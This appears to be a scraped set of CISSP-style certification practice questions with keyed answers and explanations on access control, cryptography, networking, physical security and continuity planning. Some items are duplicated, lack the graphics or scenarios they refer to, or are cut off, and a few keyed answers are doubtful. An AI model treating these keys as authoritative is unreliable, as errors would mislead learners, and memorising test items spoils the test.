A. The three main security principles for any and all security controls are availability, integrity, and confidentiality (AIC). Clearly each of these is a concern for this organization's mission. However, the confidentiality as to the disposition and location of these materials is of the highest priority. If an adversary were to gain access to knowledge of something as mundane as where large volumes of toilet paper were being shipped, they could infer troop movements in advance of a military offensive action.

When should security first be addressed in a project? A. During requirements development B. During integration testing C. During design specifications D. During implementation

A. The trick to this question, and any one like it, is that security should be implemented at the first possible phase of a project. Requirements are gathered and developed at the beginning of a project, which is project initiation. The other answers are steps that follow this phase, and security should be integrated right from the beginning instead of in the middle or at the end.

Unix and Linux systems use salts when storing passwords. Which of the following is a true statement pertaining to the use of Salts? A. The use of different salts means that the same password could end up in different formats. B. Salts provide the same functionality of syskey, but encrypting the full password file. C. Salts are used when passwords are held in a shadow file, which decreases the protection level of the passwords. D. The use of different salts means that an attacker will have an easier time of uncovering encrypted passwords.

A. The use of different salts means that the same password could end up in different formats.

How is Kerberos a single sign-on technology? A. The user enters his credentials one time and obtains a TGT. The user uses the TGT each time he needs to communicate to a network resource. B. The user enters his credentials one time and obtains a TGS. The user uses the TGS each time he needs to communicate to a network resource. C. The AS keeps the user's authentication information in memory to ensure that an authenticated user does not need to continue to enter credentials. D. The TGS keeps the user's authentication information in memory to ensure that an authenticated user does not need to continue to enter credentials.

A. The user enters his credentials one time and obtains a TGT. The user uses the TGT each time he needs to

COBIT and COSO can be used together, but have different goals and focuses. Which of the following is incorrect as it pertains to these two models? i.COSO is a model for corporate governance, and COBIT is a model for IT governance. ii.COSO deals more at the strategic level, while COBIT focuses more at the operational level. iii.COBIT is a way to meet many of the COSO objectives, but only from the IT perspective. iv.COSO deals with non-IT items also, as in company culture, financial accounting principles, board of director responsibility, and internal communication structures. A. None B. All C. i, ii D. ii, iii

A. They are all correct.

Which of the following does not describe the use of security guards? A. they are not expensive. B. they provide a lot of flexibility. C. they can deter intruders D. Their worth depends on each individuals's work ethic.

A. They are not expensive.

The diagram shown here explains which of the following concepts? A. crossover error rate B. Type III errors C. FAR equals FRR in systems that have a high crossover error rate D. Biometrics is a high acceptance technology.

A. This rating is stated as a percentage and represents the point at which the false rejection rate equals the false acceptance rate. This rating is the most important measurement when determining a biometric system's accuracy. Type I error Rejects authorized individual False rejection rate (FRR) Type II error Accepts impostor False acceptance rate (FAR)

A multitasking operating system can have several processes running at the same time. What are the components within the processes that are shown in the graphic that follows? A. Threads. B. Registers. C.Address buses. D. Process tables.

A. Threads.

In physical security what are electronic access control (EAC) tokens used for? A. To authenticate subjects. B. To control the amount of radiation that escapes from control rooms. C. To lock down a facility or system after an intrusion has been detected. D. To authenticate objects.

A. To authenticate subjects.

Michael is charged with developing a data classification program for his company. Which of the following should he do first? A. Understand the different levels of protection that must be provided. B. Specify data classification criteria C. identify the data custodians D. Determine protection mechanisms for each classification level

A. Understand the different levels of protection that must be provided.

Security countermeasures should be transparent to users and attackers. Which of the following does NOT describe transparency? A. User activities are monitored and tracked without negatively affecting system performance. B. User activities are monitored and tracked without the user knowing about the mechanism that is carrying this out. C. Users are allowed access in a manner that does not negatively affect business processes. D. Unauthorized access attempts are denied and logged without the intruder knowing about the mechanism that is carrying this out.

A. Unfortunately, security components usually affect system performance in one fashion or another, although many times it is unnoticeable to the user. There is a possibility that if a system's performance is noticeably slow, this could be an indication that security countermeasures are in place. The reason that controls should be transparent is so that users and intruders do not know enough to be able to disable or bypass them. The controls should also not stand in the way of the company being able to carry out its necessary functions.

Which of the following indicates a packet where to go and how to communicate with the right service or protocol on the destination computer? A. Socket B. IP address C. Port D. Frame

A. User Datagram Protocol (UDP) and Transmission Control Protocol (TCP) are transport protocols that applications use to get their data across a network. They both use ports to communicate with upper OSI layers and to keep track of various conversations that take place simultaneously. The ports are also the mechanism used to identify how other computers access services. When a TCP or UDP message is formed, a source and a destination port are contained within the header information along with the source and destination IP addresses. This makes up a socket, which is how packets know where to go—by the address—and how to communicate with the right service or protocol on the other computer—by the port number. The IP address acts as the doorway to a computer, and the port acts as the doorway to the actual protocol or service. To communicate properly, the packet needs to know these doors.

Session initiation protocol consists of two major components: The _____ and ______. A. User agent client, user agent server. B. User agent client, user agent service. C. user client, user service. D. User urgent client, user urgent server.

A. User agent client, user agent server.

Radius a protocol that has been used for many years for centralized remote access control. Which of the following properly explains a traditional radius architecture? A. User is a client to the access server and the access server is a client to the RADIUS server. Communication cannot go directly from the user to the RADIUS server. B. User is a client to the access server and the access server is a client to the user. Communication cannot go directly from the user to the RADIUS server. C. User is a client to the access server and the access server is a client to the RADIUS server. Communication can go directly from the user to the RADIUS server. D. User is a client to the RADIUS server the RADIUS server is a client to the access server. Communication cannot go directly from the user to the RADIUS server.

A. User is a client to the access server and the access server is a client to the RADIUS server. Communication cannot go directly from the user to the RADIUS server.

Proper access control requires a structured user provisioning process. Which of the following best describes user provisioning? A. The creation, maintenance, and deactivation of user objects and attributes as they exist in one or more systems, directories, or applications, in response to business processes B. The creation, maintenance, activation, and delegation of user objects and attributes as they exist in one or more systems, directories, or applications, in response to compliance processes C. The maintenance of user objects and attributes as they exist in one or more systems, directories, or applications, in response to business processes D. The creation and deactivation of user objects and attributes as they exist in one or more systems, directories, or applications, in response to business processes

A. User provisioning refers to the creation, maintenance, and deactivation of user objects and attributes as they exist in one or more systems, directories, or applications in response to business processes.

Angela wants to group together computers by the department to make it easier for them to share network resources. Which of the following will best allow her to group computers logically? A. VLAN B. Open network architecture C. Intranet D. VAN

A. Virtual LANs (VLANs) enable the logical separation and grouping of computers based on resource requirements, security, or business needs in spite of the standard physical location of the systems. This technology allows Angela to logically place all computers within the same department on the same VLAN network so that all users can receive the same broadcast messages and can access the same types of resources, regardless of their physical location. This means that computers can be grouped together even if they are not located on the same network.

Which of the following best describes the difference between a virtual firewall that works in bridge mode versus one that is embedded into a hypervisor? A. Bridge-mode virtual firewall allows the firewall to monitor individual traffic links, and hypervisor integration allows the firewall to monitor all activities taking place within a host system. B. Bridge-mode virtual firewall allows the firewall to monitor individual network links, and hypervisor integration allows the firewall to monitor all activities taking place within a guest system. C. Bridge-mode virtual firewall allows the firewall to monitor individual traffic links, and hypervisor integration allows the firewall to monitor all activities taking place within a guest system. D. Bridge-mode virtual firewall allows the firewall to monitor individual guest systems, and hypervisor integration allows the firewall to monitor all activities taking place within a network system.

A. Virtual firewalls can be bridge-mode products, which monitor individual traffic links between virtual machines, or they can be integrated within the hypervisor of a virtualized environment. The hypervisor is the software component that carries out virtual machine management and oversees guest system software execution. If the firewall is embedded within the hypervisor, then it can "see" and monitor all the activities taking place within the host system.

Which of the following best defines a virtual machine? A. Virtual instance of an operating system. B. A piece of hardware that runs multiple operating system environments simultaneously. C. A physical environment for multiple guests. D. An environment that can be fully utilized while running legacy applications.

A. Virtual instance of an operating system.

Virtualization offers many benefits. Which of the following incorrectly describes virtualization? A. Virtualization simplifies operating system patching. B. Virtualization can be used to build a secure computing platform. C. Virtualization can provide fault and error containment. D. Virtual machines offer powerful debugging capabilities.

A. Virtualization simplifies operating system patching.

What is the greatest weakness, and hence concern, with virtualized networks? A. Because network interface cards (NICs) are virtualized (vNICs), the data traveling between them is merely copied from one memory location to another by the hypervisor layer on a single physical host. B. The absence of a physical network makes it impossible to deploy firewalls or intrusion detection systems to regulate and monitor traffic between the virtual systems. C. Virtual networks are essentially clouds with no well-defined topologies. This makes the network paths between virtual systems impossible to know. D. Virtual NICs have much higher throughputs than physical ones. As a result, modern network-based intrusion detection systems (NIDSs) cannot inspect their traffic at real-time speeds.

A. Virtualized networking means that data transmission does not cross a physical link, but is merely a memory operation within a single host upon which all the virtual systems reside. Consequently, a single compromise of the hypervisor can essentially result in a compromise of the entirety of the virtual network it provides

Alice needs to hire a third party to conduct a test of her company's security posture. If she needs an exhaustive enumeration of her company's vulnerabilities for prioritization of mitigation, which of the following services should she select? A. Vulnerability assessment. B. Penetration Test. C. Regulatory Audit. D. DSS Audit.

A. Vulnerability assessment.

Alice needs to hire a third party to conduct a test of her company's security posture. If she needs an exhaustive enumeration of her company's vulnerabilities for prioritization of mitigation, which of the following services should she select? A. Vulnerability assessment. B. penetration test C. regulatory audit. D. dss audit.

A. Vulnerability assessment.

Which of the following should be used to suppress a class A fire? A. Water B. Gas C. C02 D FM-200

A. Water.

The common criteria in the simplest form works to answer two distinct questions. What are they? A. What does the product do and how sure are you of it? B. What security mechanisms are in place and how reliable are they? C. Do other products exist like this one and which is better? D. How trustworthy is the manufacturer and what other products do they make?

A. What does the product do and how sure are you of it?

Which of the following uses a symmetric key and a hashing algorithm? A. HMAC B. Triple-DES C. ISAKMP-OAKLEY D. RSA

A. When an HMAC function is used, a symmetric key is combined with the message, and then that result is put though a hashing algorithm. The result is an HMAC value. HMAC provides data origin authentication and data integrity.

There are several different types of important architectures within public key infrastructures. Which architecture does the graphic that follows represent? A. Cross-certification B. Cross-revocation list C. Online Certificate Status Protocol D. Registration authority

A. When independent PKIs need to interconnect to allow for secure communication to take place (either between departments or different companies), there must be a way for the two root CAs to trust each other. The two CAs do not have a CA above them they can both trust, so they must carry out cross-certification. A cross-certification is the process undertaken by CAs to establish a trust relationship in which they rely upon each other's digital certificates and public keys as if they had issued them themselves. When this is set up, a CA for one company can validate digital certificates from the other company and vice versa.

Which are the best reasons why a code versioning system (CVS) is an important part of a development infrastructure? It can ensure that code modifications are made according to corporate policies. It will document who made which changes to ensure accountability. It will reduce the cost of the development infrastructure. It can provide control over unauthorized access to proprietary code. A. i, ii, iv B. iii C. iii, iv D. All of the above

A. When properly configured and deployed, a CVS can help ensure that corporate change control policies and procedures are adhered to and should log all code accesses as a detective control as well. But foremost, a CVS can help ensure that code is only ever accessed by an authorized developer. Such controls present some additional overhead, but tend to be worth the expense.

Which of the following is an assessment that affords the auditor detailed knowledge of the system's architecture before conducting the test? A. White box testing B. Gray box testing C. Black box testing D. Zero knowledge testing

A. White box testing gives the tester detailed information about the internal workings of the system under study. Gray box testing provides some information, so it is not the best answer to this question.

Which of the following refers to the assessment of a system by someone with full knowledge of how it was designed or implemented? A. White box testing. B. Gray box testing. C. Black Box testing. D. Blue box testing.

A. White box testing.

What could be the most significant result of a flaw in file or directory permission settings? A. a privileged service could be installed by an attacker, yielding system-level control. B. Important files could be maliciously deleted or overwritten by an attacker. C. Sensitive files could be read, bypassing access controls. D. Errors in file or directory permission settings don't tend to be very critical, because only an attacker with local access can exploit them.

A. a privileged service could be installed by an attacker, yielding system-level control.

Which of the following best describes the type of technology the team should implement to increase the work effort of buffer overflow attacks? A. address space layout randomization. B. Memory induction application. C. input memory isolation. D. Read-only memory integrity checks.

A. address space layout randomization.

Business continuity plans are required for: A. all areas of the enterprise. B. Financial resources and information processing. C. Operating areas of the enterprise. D. Marketing, Finance, and Information processing.

A. all areas of the enterprise.

Alice, Bob, and many of their colleagues have spent months constructing a business continuity plan (BCP) for their enterprise. What is the first test of their finding that should be conducted? A. checklist test. B. Structured walk-through test? C. Simulation test? D. Parallel test.

A. checklist test.

There are five different classes of fire. Each depends upon what is on fire. Which of the following is the proper mapping for the items missing in the provided table? 1. fire class type of fire elements of fire suppression method 2. class A. Water, soda acid. 3. Class B co2 fm-200 4. class c gas (halon) or co2, nonconductive extinguishing agent. 5. class D dry chemicals 6. class k A wet chemical A. class d-- combustible metals B. class c liquid c. class b electrical d. class A electrical.

A. class d-- combustible metals

What type of operating parameter can an administrator set that would lock out a user after too many failed attempts at login? A. clipping level. B. password checker. C. Account Expiry. D. Password History.

A. clipping level.

Tom is setting up computers at a trade show for his company's booth. The computers will give customers the opportunity to access a new product but will also take them onto a live network. Which control would be the best fit to offer necessary protection from public users gaining privileged access? A. constrained user interface. B. Role-based C. Discretionary-based D. network segregation.

A. constrained user interface.

______ is a discipline that outlines how the proper design of a physical environment can reduce crime by directly affecting human behavior. A. crime prevention through environmental design. B. Security prevention through environmental design. C. Crime prevention through security design. D. Crime prevention through environmental development

A. crime prevention through environmental design.

Mike is the new CSO of a large pharmaceutical company. He has been asked to revamp the company's physical security program and better align it with the company's information security practices. Mike knows that the new physical security program should be made up of controls and processes that support the following categories: deterrent, delaying, detection, assessment, and response. Mike's team has decided to implement new perimeter fences and warning signs against trespassing around the company's facility. Which of the categories listed in the scenario do these countermeasures map to? A. deterrent B. delaying. C. Detection D.Assessment.

A. deterrent

If an operating system allows sequential use of an object without refreshing it, what security issue can arise? A. disclosure of residual data B. Unauthorized access to privileged processes C. Data leakage through covert channels. D. Compromise of the execution domain.

A. disclosure of residual data

If an operating system allows sequential use of an object without refreshing it, what security issue can arise? A. disclosure of residual data. B. Unauthorized access to privileged processes C. Data leakage through covert channels D. Compromising the execution domain.

A. disclosure of residual data.

Extranets, VANs, and shared network with external entities create what legal concern? A. downstream liability B. increased SLAs C. Human resource issues D. Network configuration complexity.

A. downstream liability

Security awareness training programs have all of the following characteristics, except: A. enforced by department heads. B.. Simple, clear, and concise. C. ongoing. D. entertaining and positive.

A. enforced by department heads.

What is the rationale behind classifying and labeling data? A. ensuring data is protected in the most cost-effective manner B. Ensuring data is not modified without proper authority. C. Ensuring data is not accessed without proper authority. D. Ensuring data is protected as rigorously as possible.

A. ensuring data is protected in the most cost-effective manner

Which of the following best describes a continuity of operation plan? A. establishes senior management and headquarters after a disaster. outlines roles and authorities,, orders of succession, and individual role tasks. B. Plan for systems, networks, and major applications recovery procedures after disruptions. A contingency plan should be developed for each major system and application. C. includes internal and external communications structure and role, identifies specific individuals who will communicate with external entities. contains pre-developed statements that are to be released. D. focuses on malware, hackers, intrusions, attacks, and other security issues. Outlines procedures for incident response.

A. establishes senior management and headquarters after a disaster. outlines roles and authorities,, orders of succession, and individual role tasks.

A node that sends and receives at the same time can perform what type of transmission? A. full-duplex B. half-duplex C. unicast D. multi-duplex.

A. full-duplex

If an employee is suspected of wrongdoing in a computer crime, what department must be involved? A. human resources. B. legal. C. auditors. D. payroll.

A. human resources.

Which of the following has/have an incorrect definition> i. foreign key: an attribute of one table that is related to the cell of another table ii. cell: an intersection of a row and column iii: schema: defines the structure of the database. iv. Data dictionary: Central repository of data elements and their relationships. A. i B. i, ii, ii C. i, ii, iv D. i, ii, iii, iv

A. i

Database software performs three main types of integrity services. Semantic, Referential, and entity. Which of the following correctly describe these services? i. A semantic integrity mechanism makes sure structural and semantic rules are enforced. ii. A database has referential integrity if all foreign keys reference existing primary keys. iii. Entity integrity guarantees that the tuples are uniquely identified by primary key values. A. i, ii, iii B. ii, iii C. i, ii D. i

A. i, ii, iii

When selecting an offsite storage facility and vendor, which of the following criteria should be considered? i. geographic area. ii. accessibility. iii. security iv. environment V. cost. A. i,ii,iii,iv,v B. i,ii, iii c. i,iii,v d ii, iii, iv

A. i, ii, iii, iv, v

Which of the following would be considered restrictions of a hierarchical database structure? i. To be able to access a certain data entity within a hierarchical database requires the knowledge of which branch to start with and which route to take through each layer until the data is reached. ii. To be able to access a certain key entity within a hierarchical database requires the knowledge of which branch to start with and which route to take through each layer until data is reached. iii. it does not use indexes as relations databases do for searching procedures. iii. It does not use indexes as relational databases do for searching procedures. iv. It does use indexes as relational databases do for searching procedures. A. i, iii B. i, ii,iii C. ii, iii, iv D. i, ii

A. i, iii

Which of the following is true of a good service level agreement (SLA)? A. it can provide a service consumer access to review the provider's security audit reports. B. It allows an organization to outsource the responsibility for data storage and protection. C. it ensures the guaranteed level of service delivery for a provider. D. It can decrease the burden of an organization's regulatory compliance.

A. it can provide a service consumer access to review the provider's security audit reports.

What is an advantage of RSA over DSA? A. it can provide digital signature and encryption functionality B. It uses fewer resources and encrypts quicker because it uses symmetric keys. C. it is a block cipher versus a stream cipher. D. It employs a one-time encryption pad.

A. it can provide digital signature and encryption functionality

Which of the following best describes key derivation functions (KDFs) A. keys are generated from a master key. B. Session keys are generated from each other. C. Asymmetric cryptography is used to encrypt symmetric keys. D. A master key is generated from a session key.

A. keys are generated from a master key.

How can logging play a role in stopping security breaches in a system? A. logging is the activity of collecting information that will be used for monitoring and auditing to enable early detection of security problems. B. logging is the cataloging of performance issues to fight intruders. C. logging plays a very minimal role in system security; it is used more as a housekeeping measure than as a factor in an effective security policy. D. logging is the process of identifying user errors and not security breaches.

A. logging is the activity of collecting information that will be used for monitoring and auditing to enable early detection of security problems

Which matches the following definition, "the use of needles to remove the outer protective material on the card's circuits, by using ultrasonic vibration. Once this is completed then data can be accessed and manipulated by directly tapping into the card's ROM chips"? A. microprobing. B. differential power analysis. C. Electromagnetic Analysis. D. Software attacks.

A. microprobing.

Part of the collection and identification stage of evidence life cycle is marking or labeling evidence. Which statement is not true regarding marking evidence? A. never mark on the original evidence. B. Seal evidence in envelope C. When sealing evidence, write on the tape that seals in shut. D. include initials, date, and case number on your mark.

A. never mark on the original evidence.

When crafting a technical security report for management, how long should the executive summary be, and what should it contain? A. no more than a page or two, highlighting only what senior leaders need to understand about the contents, which could run to hundreds of pages. B. no more than five pages, highlighting only what senior leaders need to understand about the contents, which could run to hundreds of pages. C. no more than a page or two, highlighting the most important technical details. D. No more than five pages, highlighting the most important technical details.

A. no more than a page or two, highlighting only what senior leaders need to understand about the contents, which could run to hundreds of pages.

An autonomous system is controlled by how many entities? A. one B. two C. three D. more than 10

A. one.

Which are the proper steps of developing a disaster recovery and continuity plan? A. project initiation, strategy development, business impact analysis, plan development, implementation, testing, and maintenance. B. Strategy development, project initiation, business impact analysis, plan development, implementation, testing, and maintenance. C. Implementation and testing, project initiation, strategy development, business impact analysis, and plan development. D. Plan development, project initiation, strategy development, business impact analysis, implementation, testing, and maintenance.

A. project initiation, strategy development, business impact analysis, plan development, implementation, testing, and maintenance.

one advantage of prototyping is that: A. prototype systems can save significant time and costs. B. Change control is often less complicated with prototype systems. C. prototypes ensure that functions or extras are not added to the intended system D. strong internal controls are easier to implement with prototypes.

A. prototype systems can save significant time and costs.

When protecting information assets, which of the following security controls is most effective for data at rest? A. requiring whole-disk encryption for all devices with the advanced encryption standard (aes). B. Implementing encryption with transport layer security or ipsec. C. Implementing whole-memory encryption with the storage keys in cpu registers. D. Requiring the use of next-generation firewalls (NGFWS) and/or network-based intrusion prevention systems (nips)

A. requiring whole-disk encryption for all devices with the advanced encryption standard (aes).

A process is suspended and waiting for an available time slot on the CPU or waiting for an event to occur. What is this known as? A. sleep state. B. Run state. C. Masked/ interruptible state . D. Wait state.

A. sleep state.

Which of the following is not considered a passive attack? A. spoofing. B. network sniffing. C. wiretapping. D. Traffic analysis.

A. spoofing.

A coffee company has created a new and unique way to package their product. Which of the following should they pursue? A. trademark. B. patent C. copyright. D. NDA.

A. trademark.

An OLTP database ensuring that no transactions are finalized until all connected systems have synchronized is employing what function? A. two-phase commit. B. Query processing C. Isolation D. Redundancy/checksum.

A. two-phase commit.

Single sign-on systems have a main strength and a main weakness. Choose the best answer exposing this strength and weakness. A. users do not need to remember multiple passwords, but access to many systems can be obtained by cracking only one password, making it less secure. B. They allow the user to make use of very simple passwords; it puts undue burden on IT to administer the system. C. They force the user to make use of stronger passwords; it makes it easer for users but encourages little attention to security policies. D. They remove the burden of remembering multiple passwords from users; users need to type the same password when confronted with authentication requests for different resources.

A. users do not need to remember multiple passwords, but access to many systems can be obtained by cracking only one password, making it less secure

When should a Class C fire extinguisher be used instead of a class A? A. when electrical equipment is on fire. B. when fuel is on fire. C. when fire or wood is on fire. D. When metal such as Magnesium is on fire.

A. when electrical equipment is on fire.

Most operating systems and applications allow for administrators to configure the data that will be captured in audit logs for security purposes. Which of the following is the least important item to be captured in audit logs? A.System performance output data. B. last user who accessed the device. C. Number of unsuccessful access attempts. D. Number of successful access attempts.

A.System performance output data.

An application is downloaded from the Internet to perform disk cleanup and to delete unnecessary temporary files. The application is also recording network login data and sending it to another party. This application is best described as which of the following? A. A virus B. A Trojan horse C. A worm D. A logic bomb

B. A Trojan horse looks like an innocent and helpful program, but in the background it is carrying out some type of malicious activity unknown to the user. The Trojan horse could be corrupting files, sending the user's password to an attacker, or attacking another computer.

Which of the following is the best way to reduce brute-force attacks that allow intruders to uncover users' passwords? A. Increase the clipping level. B. Lock out an account for a certain amount of time after the clipping level is reached. C. After a threshold of failed login attempts is met, the administrator must physically lock out the account. D. Choose a weaker algorithm that encrypts the password file.

B. A brute-force attack is an attack that continually tries different inputs to achieve a predefined goal, which can then be used to obtain credentials for unauthorized access. A brute-force attack to uncover passwords means that the intruder is attempting all possible sequences of characters to uncover the correct password. If the account would be disabled (or locked out) after this type of attack attempt took place, this would prove to be a good countermeasure.

What technology within identity management is illustrated in the graphic that follows? A. User provisioning B. Federated identity C. Directories D. Web access management

B. A federated identity is a portable identity and its associated entitlements that can be used across business boundaries. It allows a user to be authenticated across multiple IT systems and enterprises. Identity federation is based upon linking a user's otherwise distinct identities at two or more locations without the need to synchronize or consolidate directory information. Federated identity offers businesses and consumers a more convenient way of accessing distributed resources and is a key component of e-commerce.

Which of the following correctly describes a federated identity and its role within identity management processes? A. A nonportable identity that can be used across business boundaries B. A portable identity that can be used across business boundaries C. An identity that can be used within intranet virtual directories and identity stores D. An identity specified by domain names that can be used across business boundaries

B. A federated identity is a portable identity and its associated entitlements that can be used across business boundaries. It allows a user to be authenticated across multiple IT systems and enterprises. Identity federation is based upon linking a user's otherwise distinct identities at two or more locations without the need to synchronize or consolidate directory information. Federated identity offers businesses and consumers a more convenient way of accessing distributed resources and is a key component of e-commerce.

Information security is a field that is maturing and becoming more organized and standardized. Organizational security models should be based upon a formal architecture framework. Which of the following best describes what a formal architecture framework is and why it would be used? A. Mathematical model that defines the secure states that various software components can enter and still provide the necessary protection B. Conceptual model that is organized into multiple views addressing each of the stakeholder's concerns C. Business enterprise framework that is broken down into six conceptual levels to ensure security is deployed and managed in a controllable manner D. Enterprise framework that allows for proper security governance

B. A formal architecture framework is a conceptual model in which an architecture description is organized into multiple architecture views, where each view addresses specific concerns originating with the specific stakeholders. Individual stakeholders have a variety of system concerns, which the architecture must address. To express these concerns, each view applies the conventions of its architecture viewpoint.

What is the name of a water sprinkler system that keeps pipes empty and doesn't release water until a certain temperature is met and a "delay mechanism" is instituted? A. Wet B. Preaction C. Delayed D. Dry

B. A link must melt before the water will pass through the sprinkler heads, which creates the delay in water release. This type of suppression system is best in data-processing environments because it allows time to deactivate the system if there is a false alarm.

Use the following scenario to answer Questions 22-24. Tom is a new security manager for a retail company, which currently has an identity management system (IdM) in place. The data within the various identity stores updates more quickly than the current IdM software can keep up with, so some access decisions are made based upon obsolete information. While the IdM currently provides centralized access control of internal network assets, it is not tied into the web-based access control components that are embedded within the company's partner portals. Tom also notices that help-desk technicians are spending too much time resetting passwords for internal employees. Which of the following changes would be best for Tom's team to implement? A. Move from namespaces to distinguished names. B. Move from meta-directories to virtual directories. C. Move from RADIUS to TACACS+. D. Move from a centralized to a decentralized control model.

B. A meta-directory within an IdM physically contains the identity information within an identity store. It allows identity information to be pulled from various locations and be stored in one local system (identity store). The data within the identity store is updated through a replication process, which may take place weekly, daily, or hourly depending upon configuration. Virtual directories use pointers to where the identity data resides on the original system; thus, no replication processes are necessary. Virtual directories usually provide the most up-to-date identity information since they point to the original source of the data.

A number of attacks can be performed against smart cards. Side-channel is a class of attacks that doesn't try to compromise a flaw or weakness. Which of the following is NOT a side-channel attack? A. Differential power analysis B. Microprobing analysis C. Timing analysis D. Electromagnetic analysis

B. A noninvasive attack is one in which the attacker watches how something works and how it reacts in different situations instead of trying to "invade" it with more intrusive measures. Examples of side-channel attacks are fault generation, differential power analysis, electromagnetic analysis, timing, and software attacks. These types of attacks are used to uncover sensitive information about how a component works without trying to compromise any type of flaw or weakness. A more intrusive smart card attack is microprobing. Microprobing uses needles and ultrasonic vibration to remove the outer protective material on the card's circuits. Once this is complete, data can be accessed and manipulated by directly tapping into the card's ROM chips.

There are different types of fire suppression systems. Which of the following answers best describes the difference between a deluge and a preaction system? A. A deluge system provides a delaying mechanism that allows someone to deactivate the system in case of a false alarm or if the fire can be extinguished by other means. A preaction system provides similar functionality but has wide open sprinkler heads that allow a lot of water to be dispersed quickly. B. A preaction system provides a delaying mechanism that allows someone to deactivate the system in case of a false alarm or if the fire can be extinguished by other means. A deluge system has wide open sprinkler heads that allow a lot of water to be dispersed quickly. C. A dry pipe system provides a delaying mechanism that allows someone to deactivate the system in case of a false alarm or if the fire can be extinguished by other means. A deluge system has wide open sprinkler heads that allow a lot of water to be dispersed quickly. D. A preaction system provides a delaying mechanism that allows someone to deactivate the system in case of a false alarm or if the fire can be extinguished by other means. A deluge system provides similar functionality but has wide open sprinkler heads that allow a lot of water to be dispersed quickly.

B. A preaction system has a link that must be burned through before water is released. This is the mechanism that provides the delay in water release. A deluge system has wide open sprinkler heads that allow a lot of water to be released quickly. It does not have a delaying component

Use the following scenario to answer Questions 33-35. Harry is overseeing a team that has to integrate various business services provided by different company departments into one web portal for both internal employees and external partners. His company has a diverse and heterogeneous environment with different types of systems providing customer relationship management, inventory control, e-mail, and help-desk ticketing capabilities. His team needs to allow different users access to these different services in a secure manner. Which of the following best describes the type of environment Harry's team needs to set up? A. RADIUS B. Service-oriented architecture C. Public key infrastructure D. Web services

B. A service-oriented architecture (SOA) will allow Harry's team to create a centralized web portal and offer the various services needed by internal and external entities.

Which of the following is most likely the issue that Grace's team experienced when their systems went offline? A. Three critical systems were connected to a dual-attached station. B. Three critical systems were connected to a single-attached station. C. The secondary FDDI ring was overwhelmed with traffic and dropped the three critical systems. D. The FDDI ring is shared in a metropolitan environment and only allows each company to have a certain number of systems connected to both rings.

B. A single-attachment station (SAS) is attached to only one ring (the primary) through a concentrator. If the primary goes down, it is not connected to the backup secondary ring. A dual-attachment station (DAS) has two ports and each port provides a connection for both the primary and the secondary rings

What is a code review? A. Making sure coders work in parallel to watch each others' work while they are coding B. Making sure coders' work has been reviewed by other coders after they are done C. Making sure that the appropriate Q/A harnesses have been applied prior to check in D. Making sure that appropriate Q/A harnesses exist

B. A static code review requires that at least one other set of eyes inspects the code before it is deployed in order to search for flaws that may have not been obvious to the author but may be apparent to another engineer. In science we call it peer review

There are several types of intrusion detection systems (IDSs). What type of IDS builds a profile of an environment's normal activities and assigns an anomaly score to packets based on the profile? a.State-based b.Statistical anomaly-based c.Misuse-detection system d.Protocol signature-based

B. A statistical anomaly-based IDS is a behavioral-based system. Behavioral-based IDS products do not use predefined signatures, but rather are put in a learning mode to build a profile of an environment's "normal" activities. This profile is built by continually sampling the environment's activities. The longer the IDS is put in a learning mode, in most instances, the more accurate a profile it will build and the better protection it will provide. After this profile is built, all future traffic and activities are compared to it. With the use of complex statistical algorithms, the IDS looks for anomalies in the network traffic or user activity. Each packet is given an anomaly score, which indicates its degree of irregularity. If the score is higher than the established threshold of "normal" behavior, then the preconfigured action will take place

Which of the following best describes why Sean's team wants to put in the mentioned countermeasure for the most commonly attacked systems? A. Prevent production system hijacking B. Reduce DoS attack effects C. Gather statistics during the process of an attack D. Increase forensic capabilities

B. A tarpit is commonly a piece of software configured to emulate a vulnerable, running service. Once the attackers start to send packets to this "service," the connection to the victim system seems to be live and ongoing, but the response from the victim system is slow and the connection may time out. Most attacks and scanning activities take place through automated tools that require quick responses from their victim systems. If the victim systems do not reply or are very slow to reply, the automated tools may not be successful because the protocol connection times out. This can reduce the effects of a DoS attack.

What is the difference between a test and an assessment? A. An assessment is a comparison between the properties of a system and some predetermined standardized configuration. A test is a series of related assessments. B. A test is a comparison between the properties of a system and some predetermined standardized configuration. An assessment is a series of related tests. C. An assessment is a systematic test to determine a system's satisfaction of some external standard authored by a third party. D. A test is a systematic assessment to determine a system's satisfaction of some external standard authored by a third party.

B. A test is an examination of the properties or behaviors of a particular system compared to a baseline established by the enterprise to satisfy the approved security posture for the system or device. An assessment is a series of such tests across a deployment of related devices or systems, performed to determine the general security posture of an entire functional area.

Several different tunneling protocols can be used in dial-up situations. Which of the following would be best to use as a VPN tunneling solution? A.L 2P B. PPTP C. IPSec D. L2TP

B. A virtual private network (VPN) is a secure, private connection through a public network or an otherwise unsecure environment. It is a private connection because the encryption and tunneling protocols are used to ensure the confidentiality and integrity of the data in transit. It is important to remember that VPN technology requires a tunnel to work, and it assumes encryption. The protocols that can be used for VPNs are Point-to-Point Tunneling Protocol (PPTP), Internet Protocol Security (IPSec), and Layer 2 Tunneling Protocol (L2TP). PPTP, a Microsoft protocol, allows remote users to set up a PPP connection to a local ISP and then create a secure VPN to their destination. PPTP has been the de facto industry-standard tunneling protocol for years, but the new de facto standard for VPNs is IPSec. PPTP is designed for client/server connectivity and establishes a single point-to-point connection between two computers. It works at the data link layer and transmits only over IP networks

The confidentiality of sensitive data is protected in different ways depending on the state of the data. Which of the following is the best approach to protecting data in transit? A. SSL B. VPN C. IEEE 802.1x D. Whole-disk encryption

B. A virtual private network (VPN) provides confidentiality for data being exchanged between two endpoints. While the use of VPNs may not be sufficient in every case, it is the only answer among those provided that addresses the question. The use of Secure Sockets Layer (SSL) is not considered secure. IEEE 802.1x is an authentication protocol that does not protect data in transit. Finally, whole-disk encryption may be a good approach to protecting sensitive data, but only while it is at rest.

Jane is suspicious that an employee is sending sensitive data to one of the company's competitors. The employee has to use this data for daily activities, thus it is difficult to properly restrict the employee's access rights. In this scenario, which best describes the company's vulnerability, threat, risk, and necessary control? A. Vulnerability is employee access rights, threat is internal entities misusing privileged access, risk is the business impact of data loss, and the necessary control is detailed network traffic monitoring. B. Vulnerability is lenient access rights, threat is internal entities misusing privileged access, risk is the business impact of data loss, and the necessary control is detailed user monitoring. C. Vulnerability is employee access rights, threat is internal employees misusing privileged access, risk is the business impact of confidentiality, and the necessary control is multifactor authentication. D. Vulnerability is employee access rights, threat is internal users misusing privileged access, risk is the business impact of confidentiality, and the necessary control is CCTV.

